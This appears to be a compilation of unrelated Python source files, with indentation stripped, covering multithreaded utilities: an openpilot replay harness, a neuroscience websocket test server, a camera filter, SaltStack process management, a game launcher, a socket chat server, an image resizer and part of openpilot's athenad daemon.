def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
shutil.rmtree('/data/params', ignore_errors=True)
params = Params()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks = cfg.should_recv_callback(msg, CP)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
|
test_run_server.py | import asyncio
import json
from live2p.start_live2p import start_live2p
import logging
from datetime import datetime
from glob import glob
from pathlib import Path
import multiprocessing
import websockets
import time
import threading
ip = 'localhost'
port = 6000
init_folder = 'e:/caiman_scratch/ori_20210209_seed'
data_folder = 'e:/caiman_scratch/ori_20210209'
# init_folder = 'd:/Frankenrig/Experiments/i141_3/20210209/e3_init'
# init_folder = 'd:/Frankenrig/Experiments/w30_2/20210324/e2'
# data_folder = 'd:/Frankenrig/Experiments/i141_3/20210209/e3'
nplanes = 3
nchannels = 2
mm3d_path = glob(data_folder+'/*.mat')[0]
now = datetime.now()
output_folder = Path(f'e:/caiman_scratch/test_results/{now.strftime("%Y%m%d_%H_%M_%S")}')
output_folder.mkdir(exist_ok=True, parents=True)
# LOGFILE = folder + '/caiman/out/pipeline_test.log'
LOGFORMAT = '{relativeCreated:08.0f} - {levelname:8} - [{module}:{funcName}:{lineno}] - {message}'
# logging.basicConfig(level=logging.ERROR, format=LOGFORMAT, filename=LOGFILE, style='{')
logging.basicConfig(level=logging.ERROR, format=LOGFORMAT, style='{')
logger = logging.getLogger('live2p')
logger.setLevel(logging.DEBUG)
test_params_unseeded = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
'nb': 2, # background compenents -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (5, 5), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'bare',
'motion_correct': True,
'expected_comps': 750,
'update_num_comps': True,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': True,
'test_both': True,
'ring_CNN': True,
'simultaneously': True,
'use_cuda': False,
}
test_params_seeded = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
'nb': 2, # background compenents -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (7, 7), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'seeded',
'motion_correct': True,
'expected_comps': 300,
'update_num_comps': False,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': False,
'test_both': False,
'ring_CNN': False,
'simultaneously': True,
'use_cuda': False,
}
test_params_seeded_add = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
'nb': 2, # background compenents -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (7, 7), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'seeded',
'motion_correct': True,
'expected_comps': 600,
'update_num_comps': True,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': False,
'test_both': False,
'ring_CNN': False,
'simultaneously': True,
'use_cuda': False,
}
server_settings = {
'ip': ip,
'port': port,
'output_folder': str(output_folder),
'Ain_path': mm3d_path,
'use_prev_init': False,
'xslice': slice(110,512-110),
'use_init_gui': False
}
def test_run_server():
start_live2p(params_dict=test_params_seeded, debug_level=1, **server_settings)
def test_send_setup():
async def send():
#setup
async with websockets.connect(f'ws://{ip}:{port}') as websocket:
out = {
'EVENTTYPE':'SETUP',
'nchannels': nchannels,
'nplanes': nplanes,
'fr': 6.36,
'folder': init_folder
}
await websocket.send(json.dumps(out))
out = {'EVENTTYPE':'START'}
await websocket.send(json.dumps(out))
asyncio.get_event_loop().run_until_complete(send())
def test_send_data(rate):
async def send():
async with websockets.connect(f'ws://{ip}:{port}') as websocket:
all_tiffs = Path(data_folder).glob('*.tif*')
for f in all_tiffs:
print(f'Sent tiff {f}')
out = {
'EVENTTYPE':'ACQDONE',
'filename': str(f)
}
out = json.dumps(out)
await websocket.send(out)
await asyncio.sleep(rate)
# stop
out = {
'EVENTTYPE': 'SESSIONDONE'
}
await websocket.send(json.dumps(out))
asyncio.get_event_loop().run_until_complete(send())
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print('Last frame (a stop frame) sent at: ', current_time)
def main():
# srv = multiprocessing.Process(target=test_run_server)
# srv = threading.Thread(target=test_run_server)
# srv.start()
# time.sleep(20)
# test_send_setup()
# time.sleep(120)
# test_send_data(1)
# srv.join()
# srv.close()
test_run_server()
if __name__ == '__main__':
main() |
camera_filter.py | """Filters a video stream.
Class CameraFilter - Crops, rotates and scales a videostream
Functions in CameraFiler:
__init__(self) - Initialize variables
__del__(self) - Deletes the thread
update(self, camera_yaw , camera_pitch, camera_zoom) - Updates variables
stop(self) - Stops the camera filter
start(self) - Starts the camera filter
handle_frame(self, frame, frame_width, frame_height,
out_width, out_height) - Crops and resizes a frame.
"""
import threading
import cv2
from .log import logger
from .io import output_adapter
from . import config
# pylint: disable=no-member
# error with import cv2
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
# handle_frame need 6 arguments
class CameraFilter:
"""Filters a video stream.
This filter rotates and cropps a video stream according to
a pitch, a jaw and a zoom variable. The videostream is from
a 180+ degree camera pointing straigt down. To mimic a gimal
camera the pitch, jaw and zoom variables are the angle,
rotation and zoom needed to look at a specific poriton of
the 180+ degree video stream.
The pitch, jaw and zoom variables are updated asynchronously
through the update funciton.
Functions in the class:
__init__(self) - Initialize variables
update(self, camera_yaw , camera_, camera_zoom)
- Updates variables
stop(self) - Stops the camera filter
start(self) - Starts the camera filter
main(self) - Main loop of the camerafilter
handle_frame(self, frame, frame_width, frame_height,
out_width, out_height)
- Crops and resizes a frame.
"""
def __init__(self, pipeline):
"""Initializes the Camerafilter.
Sets some default starting values
Initializes and starts the CameraFilter thread.
"""
self.pipeline = pipeline
# Init thread
self.semaphore = threading.Semaphore()
self.thread = threading.Thread(target=self.main)
# Set Defaults
self.camera_yaw , self.camera_pitch, self.camera_zoom,\
self.camera_roll = 0,0,4,0
self.stopped = False
self.camera_input = 0
# Get ouptuptAdapter
self.output_adapter = output_adapter.OutputAdapter()
def update(self, camera_yaw , camera_pitch, camera_zoom, camera_roll=0):
"""Updates the cropping values of the CameraFilter."""
self.semaphore.acquire()
self.camera_yaw = camera_yaw
self.camera_pitch = camera_pitch
self.camera_zoom = camera_zoom
self.camera_roll = camera_roll
self.semaphore.release()
def stop(self):
"""Stops the Camerafilter."""
self.stopped = True
self.thread.join()
def start(self, camera_input=0):
"""Starts the Camerafilter."""
# Set defaults
self.camera_yaw, self.camera_pitch, self.camera_zoom,\
self.camera_roll = 0,0,4,0
self.stopped = False
self.camera_input = camera_input
self.thread.start()
def main(self):
"""The main function of the class.
Takes input videostream input.
Crops and rotates according to camera_yaw ,
camera_pitch and camera_zoom.
Outputs the proccesed videostream.
"""
cap = cv2.VideoCapture(self.camera_input if self.camera_input
else config.CONFIG['cam_input'])
cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
if not cap.isOpened():
logger.error("no camera")
raise ValueError("No camera")
cnt = 0 # Initialize frame counter
# Some characteristics from the original video
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# Getting width and height of output from config file
width = config.CONFIG['cam_width']
height = config.CONFIG['cam_height']
while not self.stopped:
ret, frame = cap.read() # Capture frame by frames
cnt += 1 # Counting the frames
# Avoid problems when video finish
if not ret:
break
self.semaphore.acquire() # Get rotation matrix
final_frame = self.handle_frame(frame, frame_width,
frame_height, width, height)
try:
self.output_adapter.send(final_frame)
cv2.waitKey(1)
except KeyboardInterrupt:
logger.info("stopped due to KeyboardInterrupt")
self.stopped = True
self.semaphore.release()
cap.release()
cv2.destroyAllWindows()
def handle_frame(self, frame, frame_width, frame_height,
out_width, out_height):
"""Handles the frame.
Takes a frame, the width and height of the frame,
and the width and the height of the croped frame as an input.
Then the function converts the frame to a matrix, rotates it,
and the crops the frame. The function returns a croped resized frame.
"""
matrix = cv2.getRotationMatrix2D((frame_width/2, frame_height/2),
self.camera_yaw , 1)
# Apply rotation matrix
rotated_frame = cv2.warpAffine(frame, matrix,
(frame_width, frame_height))
relative_pitch = (frame_height/2 -\
(out_height/2)/self.camera_zoom)*self.camera_pitch
matrix_roll = cv2.getRotationMatrix2D((frame_width/2,
frame_height/2 - relative_pitch), self.camera_roll, 1)
rotated_frame = cv2.warpAffine(rotated_frame, matrix_roll,
(frame_width,frame_height))
# Crop the frame
crop_frame = cv2.getRectSubPix(rotated_frame,
(int(out_width/self.camera_zoom),
int(out_height/self.camera_zoom)),
(frame_width/2, frame_height/2
- relative_pitch))
# Resize the frame
return cv2.resize(crop_frame, (out_width,out_height))
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import signal
import logging
import multiprocessing
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
log.debug("Started '{0}' with pid {1}".format(tgt.__name__, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
for p_map in six.itervalues(self._process_map):
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
|
runGame.py | import os
import threading
from time import sleep
PATH_SERVER = "server"
AGENTS = "default-broker,TUC_TAC,DiCaprio"
# Key: Agent's name. Value: [Agent's path, Binaries]
# AGENT_INFO = {"TUC_TAC": ["brokers/TUC_TAC", "TUC_TAC_2020.jar"],
# "DiCaprio": ["brokers/DiCaprio", "DiCaprio-1.7.0.jar"],
# }
AGENT_INFO = {"DiCaprio": ["brokers/DiCaprio", "DiCaprio-1.7.0.jar"]
}
SERVER_BOOT_TIME = 10
def run_bootstrap(game_name):
return_value = os.system("cd " + PATH_SERVER + " && mvn -Pcli -Dexec.args=\"--boot " + game_name + " --game-id " + game_name + "\"")
print(f"Bootstrap for {game_name} thread returned {return_value}")
def run_game(game_name):
return_value = os.system("cd " + PATH_SERVER + " && mvn -X -Pcli -Dexec.args=\"--sim --boot-data " + game_name + " --game-id " + game_name + " --brokers " + AGENTS + "\"")
print(f"Run game for {game_name} thread returned {return_value}")
def run_agent(agent_name):
sleep(SERVER_BOOT_TIME)
return_value = os.system(f"java -jar {AGENT_INFO[agent_name][0]}/{AGENT_INFO[agent_name][1]}")
print(f"{agent_name} thread returned {return_value}")
def run_game_and_agents(game_name):
game = threading.Thread(target=run_game, args=(game_name,))
threads = [threading.Thread(target=run_agent, args=(agent_name,)) for agent_name in AGENT_INFO.keys()]
threads.append(game)
for thread in threads:
thread.start()
# game_name = "bootstrap"
# # run_bootstrap(game_name)
# run_game_and_agents(game_name)
# run_agent("DiCaprio") |
server4.py | import socket
import sys
import time
from thread import *
import threading
port = 6003
clients = []
here = {}
guest_cnt = -1
shutdown = False
help_mess = "type /p for getting all the people connected to the server\n" \
"type /m [NAME] for sending a message to a certain user\n" \
"type anything without a forward slash (/) to send a message to every user!\n" \
"type /q to quit and leave us :("
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
except socket.error, msg:
print("Bind failed. Error Code: " + str(msg[0]) + " Message: " + msg[1])
sys.exit()
# while 1:
# try:
# s3.connect(('127.0.0.1', 6002))
# break
# except:
# continue
# finally:
# break
s.listen(10)
print "Listening"
s3, ip = s.accept()
def receive_server3():
while 1:
try:
data = s3.recv(2048)
if data == "":
print "I'm there!"
break
else:
recv_not(data, s3)
except:
break
def client_thread(c):
global s3
c.sendall("Welcome!\nType y to enter your name or n to have an auto generated name.")
try:
data = c.recv(1024)
data = data.strip(' \t\n\r')
serv_name(data, c)
except:
print "someone left prematurely"
c.close()
return
for client in here.values():
if not client == c:
client.sendall("2")
serv_people(c)
temp_name = get_name(c)
for client in here.values():
client.sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " + temp_name + " has joined")
while True:
try:
mess = c.recv(2048)
if mess == "/q":
parse(mess, c)
notify("quit", temp_name, "", "", 0, s3)
for client in here.values():
client.sendall("2")
serv_shout(temp_name + " has disconnected.", None, 1)
break
parse(mess, c)
except:
try:
del clients[clients.index(temp_name)]
here.pop(temp_name) # notify
notify("quit", temp_name, "", "", 0, s3)
print temp_name + " Disconnected"
serv_shout(temp_name + " has disconnected.", None, 1)
for client in here.values():
client.sendall("2")
except:
notify("quit", temp_name, "", "", 0, s3)
for client in here.values():
client.sendall("2")
print temp_name + " Disconnected"
serv_shout(temp_name + " has disconnected.", None, 1)
break
# c.close()
def Main():
t = threading.Thread(target=receive_server3, args=())
t.start()
while 1:
# start_new_thread(server_thread(), )
c, addr = s.accept()
# print "I'm here!"
print "Connected to: " + str(addr)
start_new_thread(client_thread, (c,))
def serv_name(data, c):
global guest_cnt
global s3
if data == "y" or data == "Y":
while True:
c.sendall("Enter your name: ")
name = c.recv(2048)
flag = 0
for i in clients:
if name == i:
flag = 1
break
if flag:
c.sendall("This name is already used!\n")
else:
clients.append(name)
here[name] = c
notify("join", name, "", "", 0, s3)
break
else:
guest_cnt += 1
name = "guest" + str(guest_cnt)
clients.append(name)
here[name] = c
notify("join", name, "", "", 0, s3)
notify("guest", str(guest_cnt), "", "", 0, s3)
def recv_not(mess, y): # spaghetti
global guest_cnt
global here
global clients
mess_list = mess.split(" ", 4)
if mess_list[0] == "join":
clients.append(mess_list[4])
for client in here.values():
client.sendall("2")
client.sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " + mess_list[4] + " has joined")
elif mess_list[0] == "guest":
guest_cnt = int(mess_list[4])
elif mess_list[0] == "quit":
try:
del clients[clients.index(mess_list[4])]
except:
print ""
for client in here.values():
client.sendall("2")
elif mess_list[0] == "shout":
for client in here.values():
client.sendall(mess_list[4])
elif mess_list[0] == "whisper":
if mess_list[2] in here.keys():
here[mess_list[2]].sendall(mess_list[4])
notify("sent", mess_list[4], "", mess_list[1], 0, y)
else:
notify("404", mess_list[4], mess_list[2], mess_list[1], mess_list[3], y)
elif mess_list[0] == "sent":
here[mess_list[1]].sendall(mess_list[4])
elif mess_list[0] == "404":
here[mess_list[1]].sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " +
"This name does not exist.")
def notify(comm, mess, name, sender, d, y):
try:
y.sendall(comm + " " + sender + " " + name + " " + str(d) + " " + mess)
except:
sys.exit(0)
def parse(mess, c):
command = mess[0:2]
if command == "/p":
serv_people(c)
elif command == "/m":
serv_private(mess, c)
elif command == "/q":
serv_quit(c)
elif command == "/h":
serv_help(c)
else:
serv_shout(mess, c, 0)
def serv_shout(mess, c, f):
if f == 0:
mod = "0 " + time.ctime(time.time()) + " : " + get_name(c) + " -> " + mess
for client in here.values():
client.sendall(mod)
notify("shout", mod, "", "", 0, s3)
else:
mod = "0 " + time.ctime(time.time()) + " : " + "SERVER" + " -> " + mess
for client in here.values():
client.sendall(mod)
notify("shout", mod, "", "", 0, s3)
def serv_people(c):
peeps = ""
for name in clients:
peeps += name
peeps += "\n"
c.sendall(peeps)
def serv_help(c):
c.sendall(help_mess)
def serv_private(mess, c):
name = get_name(c)
mess_list = mess.split(" ", 2)
mod = "1 " + time.ctime(time.time()) + " : " + name + "-> " + mess_list[2]
if mess_list[1] in here.keys():
here[mess_list[1]].sendall(mod)
c.sendall(mod)
else:
notify("whisper", mod, mess_list[1], name, 1, s3) # TODO 4
def serv_quit(c):
temp_name = get_name(c)
print str(temp_name) + " has disconnected."
del clients[clients.index(temp_name)]
here.pop(temp_name)
c.close()
def get_name(c):
for key in here.keys():
if here[key] == c:
return key
if __name__ == '__main__':
Main()
|
resize.py | import os
import sys
import logging
import argparse
from tqdm import tqdm
import multiprocessing
from multiprocessing import Queue, Pool, Process
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
logger = logging.getLogger("ImageResizer")
logger.setLevel(logging.INFO)
formatter = logging.Formatter(fmt='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S')
handler = logging.FileHandler('log.resize.txt', mode="w")
handler.setFormatter(formatter)
logger.addHandler(handler)
def resize_image(images, image_dir, output_dir, size):
for image in images:
image_path = os.path.join(image_dir, image)
if not os.path.exists(image_path):
continue
with open(image_path, 'r+b') as f:
#with Image.open(f) as img:
try:
img = Image.open(f)
except OSError as e:
print(e)
continue
img = img.resize([size, size], Image.ANTIALIAS)
try:
img.save(os.path.join(output_dir, image), img.format)
except:
img = img.convert('RGB')
img.save(os.path.join(output_dir, image), img.format)
finally:
logger.info(f'> {image} processed')
def main(args):
sample_file = args.sample_file
input_dir = args.input_dir
output_dir = args.output_dir
size = args.image_size
if not os.path.exists(output_dir):
os.makedirs(args.output_dir)
image_set = set(os.listdir(output_dir))
train_set = set([line.strip().split('\t')[0].split('/')[-1] for line in open(sample_file)])
images = list(train_set - image_set)
print(f'train_set - image_set -> {len(images)}')
n = 70000
image_lists = [images[i:i + n] for i in range(0, len(images), n)]
for i, image_list in enumerate(image_lists):
print(f'list-{i} -> {len(image_list)}')
processes = []
for image_list in image_lists:
process = Process(target=resize_image, args=(image_list, input_dir, output_dir, size,))
process.start()
processes.append(process)
for process in processes:
process.join()
logging.info('Resize done!')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--sample-file', type=str, help='train data file')
parser.add_argument('--input-dir', type=str,
help='directory for source images')
parser.add_argument('--output-dir', type=str, default='./resized',
help='directory for saving resized images')
parser.add_argument('--image-size', type=int, default=256, # for cropping purpose
help='size for image after processing')
args = parser.parse_args()
main(args)
|
athenad.py | #!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
